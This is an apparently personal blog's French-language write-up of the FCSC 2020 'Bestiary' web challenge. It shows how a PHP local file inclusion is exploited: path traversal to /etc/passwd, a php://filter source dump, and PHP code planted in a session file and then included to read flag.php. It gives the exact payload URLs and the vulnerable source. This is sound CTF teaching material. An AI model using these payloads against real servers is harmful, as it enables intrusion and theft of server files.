<!DOCTYPE html>
<html lang="en">





<head>
  <meta charset="UTF-8">
  <meta http-equiv="X-UA-Compatible" content="IE=edge">
  <meta name="description" content="Write-up du challenge web Bestiary du France Cybersecurity Challenge 2020">
  <meta name="keywords" content="blog and jekyll">
  <meta name="author" content="FCSC 2020 - Web - Bestiary | Thomas • Personal blog">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <meta name="theme-color" content="#f5f5f5">

  <!-- Twitter Tags -->
  <meta name="twitter:card" content="summary">
  <meta name="twitter:title" content="FCSC 2020 - Web - Bestiary | Thomas • Personal blog">
  <meta name="twitter:description" content="Write-up du challenge web Bestiary du France Cybersecurity Challenge 2020">
  
    <meta property="twitter:image" content="/img/leonids-logo.png">
  

  <!-- Open Graph Tags -->
  <meta property="og:type" content="blog">
  <meta property="og:url" content="/articles/2020-05/FCSC-2020-bestiary">
  <meta property="og:title" content="FCSC 2020 - Web - Bestiary | Thomas • Personal blog">
  <meta property="og:description" content="Write-up du challenge web Bestiary du France Cybersecurity Challenge 2020">
  
    <meta property="og:image" content="/img/leonids-logo.png">
  
  <title>FCSC 2020 - Web - Bestiary | Thomas • Personal blog</title>

  <!-- CSS files -->
  <link rel="stylesheet" href="/css/font-awesome.min.css">
  <link rel="stylesheet" href="/css/main.css">

  <link rel="canonical" href="/articles/2020-05/FCSC-2020-bestiary">
  <link rel="alternate" type="application/rss+xml" title="Thomas • Personal blog" href="/feed.xml" />

  <!-- Icons -->
  <!-- 16x16 -->
  <link rel="shortcut icon" href="/favicon.ico">
  <!-- 32x32 -->
  <link rel="shortcut icon" href="/favicon.png">
</head>


<body>
  <div class="row">
    <div class="col s12 m3">
      <div class="table cover">
        

<div class="cover-card table-cell table-middle">
  
  <a href="/">
    <img src="/img/avatar.png" alt="" class="avatar">
  </a>
  
  <a href="/" class="author_name">Thomas</a>
  
  <span class="author_job">Infosec student</span>
  
  
  <span class="author_bio mbm">CTF write-ups and articles</span>
  
  <nav class="nav">
    <ul class="nav-list">
      <li class="nav-item">
        <a href="/">home</a>
      </li>
         
      <li class="nav-item">
        <a href="/about/">About</a>
      </li>
        
      <li class="nav-item">
        <a href="/archive/">Archive</a>
      </li>
          
      <li class="nav-item">
        <a href="/categories/">Categories</a>
      </li>
              
      <li class="nav-item">
        <a href="/tags/">Tags</a>
      </li>
         
    </ul>
  </nav>
  <script type="text/javascript">
  function gen_mail_to_link(hs, subject) {
    var lhs,rhs;
    var p = hs.split('@');
    lhs = p[0];
    rhs = p[1];
    document.write("<a class=\"social-link-item\" target=\"_blank\" href=\"mailto");
    document.write(":" + lhs + "@");
    document.write(rhs + "?subject=" + subject + "\"><i class=\"fa fa-fw fa-envelope\"></i><\/a>");
  }
</script>
<div class="social-links">
  <ul>
    
    
    
    
    
    
    
    
    
    <li><a href="http://github.com/thyzavard" class="social-link-item" target="_blank"><i class="fa fa-fw fa-github"></i></a></li>
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    <li><a href="https://root-me.org/thyz" class="social-link-item" target="_blank"><i class="fa fa-fw fa-lock"></i></a></li>
    <li><a href="https://www.hackthebox.eu/home/users/profile/106328" class="social-link-item" target="_blank"><i class="fa fa-fw fa-cube"></i></a></li>
  </ul>
</div>

</div>

      </div>
    </div>
    <div class="col s12 m9">
      <div class="post-listing">
        <a class="btn" href= "/" >
  Home
</a>



<div id="post">
  <header class="post-header">
    <h1 title="FCSC 2020 - Web - Bestiary">FCSC 2020 - Web - Bestiary</h1>
    <span class="post-meta">
      <span class="post-date">
        10 MAY 2020
      </span>
      •
      <span class="read-time" title="Estimated read time">
  
  
    4 mins read
  
</span>

    </span>

  </header>

  <article class="post-content">
    <p><img src="/img/fcsc_logo.png" width="300" class="center-image" />
Le France CyberSecurity Challenge est une compétition en ligne organisée par l’Agence National de la Sécurité des Systèmes d’Informations (ANSSI). Ce CTF a pour but de préselectionner 30 joueurs: 15 juniors (entre 15 et 20 ans) et 15 seniors (entre 21 et 25 ans).</p>
<hr />

<p><img src="/img/fcsc_bestiary.PNG" alt="Challenge" class="center-image" /></p>

<p>Bestiary a été mon challenge préféré, l’exploitation de la LFI était très intéressante !</p>

<p>C’est un site où l’on peut simplement effectuer des recherches sur des monstres.</p>

<p><img src="/img/fcsc_home.PNG" alt="Home" class="center-image" /></p>

<p>On devine assez rapidement que la paramètre ‘monster’ de la requête GET est à injecter.<br />
On test un payload classique pour voir s’il est possible d’avoir une LFI : <code class="language-plaintext highlighter-rouge">http://challenges2.france-cybersecurity-challenge.fr:5004/index.php?monster=../../../../etc/passwd</code></p>

<p><img src="/img/fcsc_lfi_etc.PNG" alt="LFI" class="center-image" /></p>

<p>On à donc une LFI :)<br />
On tente d’afficher le code source avec un filter PHP.
<code class="language-plaintext highlighter-rouge">http://challenges2.france-cybersecurity-challenge.fr:5004/index.php?monster=php://filter/convert.base64-encode/resource=index.php</code></p>

<p><img src="/img/fcsc_bestiary_base.PNG" alt="Base" class="center-image" /></p>

<p>On décode tout ça en base64 et on obtient le code source la page <code class="language-plaintext highlighter-rouge">index.php</code> :</p>
<div class="language-php highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cp">&lt;?php</span>
	<span class="nb">session_save_path</span><span class="p">(</span><span class="s2">"./sessions/"</span><span class="p">);</span>
	<span class="nb">session_start</span><span class="p">();</span>
	<span class="k">include_once</span><span class="p">(</span><span class="s1">'flag.php'</span><span class="p">);</span>
<span class="cp">?&gt;</span>
<span class="nt">&lt;html&gt;</span>
<span class="nt">&lt;head&gt;</span>
	<span class="nt">&lt;title&gt;</span>Bestiary<span class="nt">&lt;/title&gt;</span>
<span class="nt">&lt;/head&gt;</span>
<span class="nt">&lt;body</span> <span class="na">style=</span><span class="s">"background-color:#3CB371;"</span><span class="nt">&gt;</span>
<span class="nt">&lt;center&gt;&lt;h1&gt;</span>Bestiary<span class="nt">&lt;/h1&gt;&lt;/center&gt;</span>
<span class="nt">&lt;script&gt;</span>
<span class="kd">function</span> <span class="nx">show</span><span class="p">()</span>
<span class="p">{</span>
	<span class="kd">var</span> <span class="nx">monster</span> <span class="o">=</span> <span class="nb">document</span><span class="p">.</span><span class="nx">getElementById</span><span class="p">(</span><span class="dl">"</span><span class="s2">monster</span><span class="dl">"</span><span class="p">).</span><span class="nx">value</span><span class="p">;</span>
	<span class="nb">document</span><span class="p">.</span><span class="nx">location</span><span class="p">.</span><span class="nx">href</span> <span class="o">=</span> <span class="dl">"</span><span class="s2">index.php?monster=</span><span class="dl">"</span><span class="o">+</span><span class="nx">monster</span><span class="p">;</span>
<span class="p">}</span>
<span class="nt">&lt;/script&gt;</span>

<span class="nt">&lt;p&gt;</span>
<span class="cp">&lt;?php</span>
	<span class="nv">$monster</span> <span class="o">=</span> <span class="k">NULL</span><span class="p">;</span>

	<span class="k">if</span><span class="p">(</span><span class="nb">isset</span><span class="p">(</span><span class="nv">$_SESSION</span><span class="p">[</span><span class="s1">'monster'</span><span class="p">])</span> <span class="o">&amp;&amp;</span> <span class="o">!</span><span class="k">empty</span><span class="p">(</span><span class="nv">$_SESSION</span><span class="p">[</span><span class="s1">'monster'</span><span class="p">]))</span>
		<span class="nv">$monster</span> <span class="o">=</span> <span class="nv">$_SESSION</span><span class="p">[</span><span class="s1">'monster'</span><span class="p">];</span>
	<span class="k">if</span><span class="p">(</span><span class="nb">isset</span><span class="p">(</span><span class="nv">$_GET</span><span class="p">[</span><span class="s1">'monster'</span><span class="p">])</span> <span class="o">&amp;&amp;</span> <span class="o">!</span><span class="k">empty</span><span class="p">(</span><span class="nv">$_GET</span><span class="p">[</span><span class="s1">'monster'</span><span class="p">]))</span>
	<span class="p">{</span>
		<span class="nv">$monster</span> <span class="o">=</span> <span class="nv">$_GET</span><span class="p">[</span><span class="s1">'monster'</span><span class="p">];</span>
		<span class="nv">$_SESSION</span><span class="p">[</span><span class="s1">'monster'</span><span class="p">]</span> <span class="o">=</span> <span class="nv">$monster</span><span class="p">;</span>
	<span class="p">}</span>

	<span class="k">if</span><span class="p">(</span><span class="nv">$monster</span> <span class="o">!==</span> <span class="k">NULL</span> <span class="o">&amp;&amp;</span> <span class="nb">strpos</span><span class="p">(</span><span class="nv">$monster</span><span class="p">,</span> <span class="s2">"flag"</span><span class="p">)</span> <span class="o">===</span> <span class="nx">False</span><span class="p">)</span>
		<span class="k">include</span><span class="p">(</span><span class="nv">$monster</span><span class="p">);</span>
	<span class="k">else</span>
		<span class="k">echo</span> <span class="s2">"Select a monster to read his description."</span><span class="p">;</span>
<span class="cp">?&gt;</span>
<span class="nt">&lt;/p&gt;</span>

<span class="nt">&lt;select</span> <span class="na">id=</span><span class="s">"monster"</span><span class="nt">&gt;</span>
	<span class="nt">&lt;option</span> <span class="na">value=</span><span class="s">"beholder"</span><span class="nt">&gt;</span>Beholder<span class="nt">&lt;/option&gt;</span>
	<span class="nt">&lt;option</span> <span class="na">value=</span><span class="s">"displacer_beast"</span><span class="nt">&gt;</span>Displacer Beast<span class="nt">&lt;/option&gt;</span>
	<span class="nt">&lt;option</span> <span class="na">value=</span><span class="s">"mimic"</span><span class="nt">&gt;</span>Mimic<span class="nt">&lt;/option&gt;</span>
	<span class="nt">&lt;option</span> <span class="na">value=</span><span class="s">"rust_monster"</span><span class="nt">&gt;</span>Rust Monster<span class="nt">&lt;/option&gt;</span>
	<span class="nt">&lt;option</span> <span class="na">value=</span><span class="s">"gelatinous_cube"</span><span class="nt">&gt;</span>Gelatinous Cube<span class="nt">&lt;/option&gt;</span>
	<span class="nt">&lt;option</span> <span class="na">value=</span><span class="s">"owlbear"</span><span class="nt">&gt;</span>Owlbear<span class="nt">&lt;/option&gt;</span>
	<span class="nt">&lt;option</span> <span class="na">value=</span><span class="s">"lich"</span><span class="nt">&gt;</span>Lich<span class="nt">&lt;/option&gt;</span>
	<span class="nt">&lt;option</span> <span class="na">value=</span><span class="s">"the_drow"</span><span class="nt">&gt;</span>The Drow<span class="nt">&lt;/option&gt;</span>
	<span class="nt">&lt;option</span> <span class="na">value=</span><span class="s">"mind_flayer"</span><span class="nt">&gt;</span>Mind Flayer<span class="nt">&lt;/option&gt;</span>
	<span class="nt">&lt;option</span> <span class="na">value=</span><span class="s">"tarrasque"</span><span class="nt">&gt;</span>Tarrasque<span class="nt">&lt;/option&gt;</span>
<span class="nt">&lt;/select&gt;</span> 
    <span class="nt">&lt;input</span> <span class="na">type=</span><span class="s">"button"</span> <span class="na">value=</span><span class="s">"show description"</span> <span class="na">onclick=</span><span class="s">"show()"</span><span class="nt">&gt;</span>
    <span class="nt">&lt;div</span> <span class="na">style=</span><span class="s">"font-size:70%"</span><span class="nt">&gt;</span>Source : https://io9.gizmodo.com/the-10-most-memorable-dungeons-dragons-monsters-1326074030<span class="nt">&lt;/div&gt;&lt;br</span> <span class="nt">/&gt;</span>
<span class="nt">&lt;/body&gt;</span>
<span class="nt">&lt;/html&gt;</span>
</code></pre></div></div>

<p>En analysant le code source, on remarque plusieurs choses intéressantes :</p>
<ul>
  <li>La fonction <code class="language-plaintext highlighter-rouge">strpos()</code> est utilisée pour vérifier que le payload ne contienne pas la chaîne de caractères “flag”</li>
  <li>Le répertoire où sont stockées les sessions est spécifié “en dur” via la fonction <code class="language-plaintext highlighter-rouge">session_save_path()</code>, alors qu’habituellement, ces dernières sont stockées …</li>
  <li>Le flag est stocké dans le fichier <code class="language-plaintext highlighter-rouge">flag.php</code></li>
</ul>

<p>Pour accéder à une session, il faut rajouter le préfix <code class="language-plaintext highlighter-rouge">sess_</code> au numéro de session stockées dans notre navigateur.<br />
<em>Par exemple, j’avais la session c70091bbb2c30521812c43b37040255a, sur le serveur, la session est stockée dans le fichier /sessions/sess_c70091bbb2c30521812c43b37040255a</em></p>

<p><img src="/img/fcsc_bestiary_session.PNG" alt="Session" class="center-image" /></p>

<p>On peut voir le contenu de ma session sur la capture d’écran ci-dessus. <br />
Comme en PHP, tout fichier inclut via la fonction <code class="language-plaintext highlighter-rouge">include()</code> est traité comme un fichier PHP, on va pouvoir injecter du code PHP dans le cookie PHPSESSID afin de le faire exécuter au serveur lorsque l’on va accéder à la session.</p>

<p>Je vais utiliser le payload suivant pour lire le fichier contenant le flag : 
<code class="language-plaintext highlighter-rouge">&lt;?php var_dump(file_get_contents(base64_decode('ZmxhZy5waHA='))); ?&gt;</code><br />
J’ai encodé le nom du fichier en base64 à cause de la fonction <code class="language-plaintext highlighter-rouge">strpos()</code> qui détecte si la chaîne “flag” est présente dans le paramètre GET ‘monter’. <br />
J’injecte donc ce payload dans ma session en effectuant la requête suivante : <code class="language-plaintext highlighter-rouge">http://challenges2.france-cybersecurity-challenge.fr:5004//index.php?monster=%3C?php%20var_dump(file_get_contents(base64_decode(%27ZmxhZy5waHA=%27)));%20?%3E</code>.</p>

<p>À ce stage, il ne me reste plus qu’à inclure le fichier contenant les informations de ma session, afin que le code PHP soit exécuté.
<code class="language-plaintext highlighter-rouge">http://challenges2.france-cybersecurity-challenge.fr:5004//index.php?monster=sessions/sess_c70091bbb2c30521812c43b37040255a</code></p>

<p>On affiche les sources et voilà !</p>

<p><img src="/img/fcsc_bestiary_flag.PNG" alt="FLAG" class="center-image" /></p>

<p>Flag <code class="language-plaintext highlighter-rouge">FCSC{83f5d0d1a3c9c82da282994e348ef49949ea4977c526634960f44b0380785622}</code></p>

  </article>
</div>

<div class="share-buttons">
  <h6>Share on: </h6>
  <ul>
    <li>
      <a href="https://twitter.com/intent/tweet?text=/articles/2020-05/FCSC-2020-bestiary" class="twitter btn" title="Share on Twitter"><i class="fa fa-twitter"></i><span> Twitter</span></a>
    </li>
  </ul>
</div>


<div id="disqus_thread"></div>
<script type="text/javascript">
    /* * * CONFIGURATION VARIABLES * * */
    var disqus_shortname = 'thomza';

    /* * * DON'T EDIT BELOW THIS LINE * * */
    (function() {
        var dsq = document.createElement('script'); dsq.type = 'text/javascript'; dsq.async = true;
        dsq.src = '//' + disqus_shortname + '.disqus.com/embed.js';
        (document.getElementsByTagName('head')[0] || document.getElementsByTagName('body')[0]).appendChild(dsq);
    })();
</script>
<noscript>Please enable JavaScript to view the <a href="https://disqus.com/?ref_noscript" rel="nofollow">comments powered by Disqus.</a></noscript>



        <footer>
  &copy; 2020 Thomas. Powered by <a href="http://jekyllrb.com/">Jekyll</a>, <a href="http://github.com/renyuanz/leonids/">leonids theme</a> made with <i class="fa fa-heart heart-icon"></i>
</footer>

      </div>
    </div>
  </div>
  <script type="text/javascript" src="/js/jquery-3.2.1.min.js"></script>
<script type="text/javascript" src="/js/main.js"></script>


</body>
</html>
